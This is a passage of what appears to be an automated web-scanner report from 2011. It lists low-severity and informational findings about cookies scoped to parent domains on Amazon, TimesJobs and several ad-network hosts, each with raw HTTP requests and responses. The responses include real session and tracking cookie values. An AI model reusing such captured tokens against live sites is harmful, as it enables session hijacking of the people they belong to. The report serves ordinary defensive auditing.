Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 421771


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...

15.10. http://www.amazon.com/dp/B002Y27P3M  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B002Y27P3M

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B002Y27P3M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:29 GMT
Server: Server
x-amz-id-1: 0717BXYES9PSJDQ1V2PY
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 1h6yE7wC1G8+JuE1Y1AtympRDo7XFCIGa8bMXRuR2y3e/Mqpf/5EOYAbk5K5ufGC
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 786246


<html>
<head>
<!-- oi -->
<scr
...[SNIP]...

15.11. http://www.amazon.com/dp/B004DERF5M  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B004DERF5M

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B004DERF5M HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:27 GMT
Server: Server
x-amz-id-1: 02PR66HK6XCWZKHF0AKH
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 9jApjDaceP4S3M3wrYjdvdE0k7eTe1wBtTwOnB9gAOviuY78WxZJ6HfC7LEE40i0
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: ubid-main=178-6795629-6544436; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-3627711-1112537; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 370055


<html>
<head>
<!-- oi -->
<script type='text/javascript'><!--
var t0_date = ne
...[SNIP]...

15.12. http://www.timesjobs.com/candidate/job-search.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.timesjobs.com
Path:   /candidate/job-search.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /candidate/job-search.html HTTP/1.1
Host: www.timesjobs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:32 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=IOpR7y80sf2bAlK6CbdyXg**.CANDAPP14; Domain=.timesjobs.com; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 120486


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <head>
       
       
                       
...[SNIP]...

15.13. http://a.collective-media.net/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?na_optout_check=true&rand=9 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dc=dc; nadp=1; optout=1

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.53
Content-Type: text/html
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 10:59:28 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net


15.14. http://a.netmng.com/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-out.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opt-out.php?s=v HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:16:14 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Set-Cookie: EVO5_OPT=1; expires=Wed, 01-Sep-2021 11:16:14 GMT; path=/; domain=.netmng.com
Set-Cookie: evo5=deleted; expires=Sat, 04-Sep-2010 11:16:13 GMT; path=/; domain=.netmng.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Connection: close
Content-Type: text/html


15.15. http://a.rfihub.com/nai_opt_out_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_opt_out_1.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_opt_out_1.gif?nocache=0.5337596 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESENHq-3Z6sPwc5smgSQucAY4; t=1314892821162; a2=6422714091563403120; t1=1314892824582; r=1314892818714; o=1-C10MkDbrkC0e; s1=1314892824582; m="aADVs7qVw==AI20472711AAABMiW4hPs=AI20472711AAABMiW4TJw=AI20472711AAABMiW4KRs="; u="aABHWMAgA==AIansXMg==AAABMiW4hPs="; f="aABg7K7RQ==AK1314892818AB3AAABMiW4hPo="; e=cb; a=c625437398271460345

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a=cOPT_OUT;Path=/;Domain=.rfihub.com;Expires=Sat, 30-Aug-31 11:14:42 GMT
Set-Cookie: j=cOPT_OUT;Path=/;Domain=.rfihub.com
Cache-Control: no-cache
Location: http://a.rfihub.com/nai_opt_out_2.gif
Content-Length: 0


15.16. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=35251889393 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ANON_ID=a5n8iUsjyDcATFMlF4kFvmXbfmPe2Hgl2cxZc0Zd2wIYGn7LZcJPbQRwEldS4eOYwHy33UyTZaUpvBG0c7ccqhrDKsD0r2lZdHVkVMZbBoPNIo2ZavSAgvEMi0GOK1ZcbjeAreHLMjvItL5s3ZdMlZaeh6Xuym3u69EZcjjPfJBgeGBN3cO2R1EjZamiXIsUYnjIJt1IZdg3YAZceQhBJcq9e9vPoaoPodVlUKxXJZbJRTSZaC08mHnbxjWZcOEwru6RCH7VrXKG9JoZcPBTp1ak3cNZaw4oWRaG9QQh0QBjmIFuQRHMlZavcbOcQrIamdIU9T0SjoZa0LGsGnbhKBKwxocCHZbZbyf75j7QjcbJQNhdZaZadlxa4VGyLoRDJuV3RhrjGYdZc9mUBDMlNjpS7s

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Sun, 04 Sep 2011 02:36:33 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sat, 03 Dec 2011 02:36:33 GMT
Set-Cookie: ANON_ID=aFn8TRrZcAQenqErk3Odt2Zd0rXEWwyuhZcmkUNhZdyIJXHBZaEZbw6Zc4mk0BDdQDjTlGinkMYT9M6BXkvxUfHmHM7x1KjFZbkZdpfcF7fBPPTZb6mYV9XcTFFuUs1jYJv7IEvudhQg0uLtYFfVsuYbeV6hUPrOiUBkg1XWDdkShCKy7MXZcycAmuZauFvdQKeIZbd3YdMTNyEhVLlAbIcjSehn6pSw9ReTNHWGZaUl4nrxvEZaLRv20S77M0VEwjqrMnv63XO5ZdTJBCTTp5rDsAv9Vl0748PorOZbbBxstVTcu2eQbNsnBg135eXoVctekZaxQPwtHUPhIgNl5VF59HnI1HdFvoP6XWZaDZdPQeHCt5lK0w4ZcskCM65gdvf2DySxVJRJoccKb; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 02:36:33 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

15.17. http://a.tribalfusion.com/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=acntIZdr2PKyruYnRY671MyFfmhZdHpni7AU5HqolbGMnoAh1myLwtwKZalWJyuDgb1kXyPrXjePLDOBMZdEl4XqZbFjGfn9fmebZd

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 11:26:33 GMT;
Content-Type: text/html
Location: /z/i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

15.18. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=987828525&th=35251889393&tKey=undefined&size=1x1&flashVer=0&ver=1.21&center=1&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&f=2&p=3769449&a=1&rnd=3765699 HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: ANON_ID=aFn8TRrZcAQenqErk3Odt2Zd0rXEWwyuhZcmkUNhZdyIJXHBZaEZbw6Zc4mk0BDdQDjTlGinkMYT9M6BXkvxUfHmHM7x1KjFZbkZdpfcF7fBPPTZb6mYV9XcTFFuUs1jYJv7IEvudhQg0uLtYFfVsuYbeV6hUPrOiUBkg1XWDdkShCKy7MXZcycAmuZauFvdQKeIZbd3YdMTNyEhVLlAbIcjSehn6pSw9ReTNHWGZaUl4nrxvEZaLRv20S77M0VEwjqrMnv63XO5ZdTJBCTTp5rDsAv9Vl0748PorOZbbBxstVTcu2eQbNsnBg135eXoVctekZaxQPwtHUPhIgNl5VF59HnI1HdFvoP6XWZaDZdPQeHCt5lK0w4ZcskCM65gdvf2DySxVJRJoccKb

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aSnay7N3Idl9IdwKUvGGUn4WnV3XqwbZbZaRQ5OJ4KqgK6baHgZaVODKjZdc1eeZcJlZblr7xX25T7bpje0BkbERXqSJj2j6iML1hTYsF9bVZbq2xvo2myWQgUbLRVIMIJPfdLurZaNwSmSBF9xLZaKcmTPrRFZclaQZab3uoFWVtCDN7eXneqpyVOia1rqva9vB0MJkwPfEb8ADsIrA486XKtA01nT03QhHZbHNEaSRYC4tYV2Zb2G5B3U4FrkeUfpqOAmS3wfn1IjQFHTm47ZbLMgB2lVTQxqL0oR8aPHSkZa1nQQf0ryTXwHqfZcBOgd6Sf16S9dTUOSg46qsjZb6qypNG9THZaglO6sZam6UHlVeFaxPEc94C7S8xeP35TIuZdDiZcRnH5vNDSa6sbdOJTSjSMlgPGISg; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 02:36:30 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 431
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg801029678 = new Image();\r\n tfimg801029678.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\r\
...[SNIP]...

15.19. http://a.tribalfusion.com/z/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.optout?f=0&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=117090495&requestor=agmtAZcW6EQMbBuQBACsBEnrPX3s8X3r8euN9itmqqQxSnmOQXlSrFPvrTEsrXc1Riqx86ZcPQMxwqPWuCP8SDPbtU7YmHtOXU HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 01-Sep-2021 11:34:36 GMT;
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

15.20. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=7&external_user_id=6731d4ad-7dae-4402-b507-a0bc233d79fb HTTP/1.1
Host: ad.afy11.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: a=9giczsQ9m0aIdZiyorEUmA; s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*k1skLaBXSZ*MTwBJmdDAvM3DP0I53ZU9KwntwMLKyCuFYUi-_lKyi5_rsvS*; c=AQECAAAAAAB7LmoESeFFTgAAAAAAAAAAAAAAAAAAAAA-4UVOAgACABGaCNXoAAAAZWNe1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1Cw8AAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIPfLgCR4UVOAAAAAAAAAAAAAAAAAAAAAIbhRU4CAAIAee5p1egAAADJQWzV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL-FxtToAAAA1yXH1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; p=AQEBAAAAAAB7LmoESeFFTj-hRU4BAAAACQAAAAEAAAABAAAAAAAAAI6Y29ToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATAAAAAAAAABYAAAAAAAAAGwAAAAAAAAAcAAAAAAAAAICGRB3QAACQhIZEHdAAAJCGhkQd0AAAkLqGRB3QAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2p7vV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADu1xNToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; f=AgEBAAAAAACLAZIHTuFFTg==

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4e3f3ebf*IGO51JNM5=*X4rmn3Q---qkEHTEYr1RbVpiIg==*,5*4e4f0e5e*5G3-0JwQvs*4hM6CBAdT525FnQM*,6*4e3f403e*prSKpc=5O1*1zX_b8qUspli5SNX8r-KTrBHYNKPsN5-pIQpNLb1HPFJGDuyf2djy7nMOB0=*,7*4e46e3c5*XTlThOIrK4*ykpnV_WHJVNS6yQYOx0XX-fLuecD8shwZ5X6ChhsIh5uQJui*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

15.21. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/ads.js?&pub=3750564&code=8093097&cch=8092811&l=300x250&tmz=-5&area=1&res=1920&rnd=0.5452898435760289&lmd=1315121336&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&ref=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 02:28:18 GMT
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 02:28:18 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 02:28:17 GMT
Content-Length: 9731


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...

15.22. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm HTTP/1.1
Host: ad.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 04:06:29 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 04:06:29 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=2976644985371547667&fpid=&nu=n&t=&
...[SNIP]...

15.23. http://ad.wsod.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

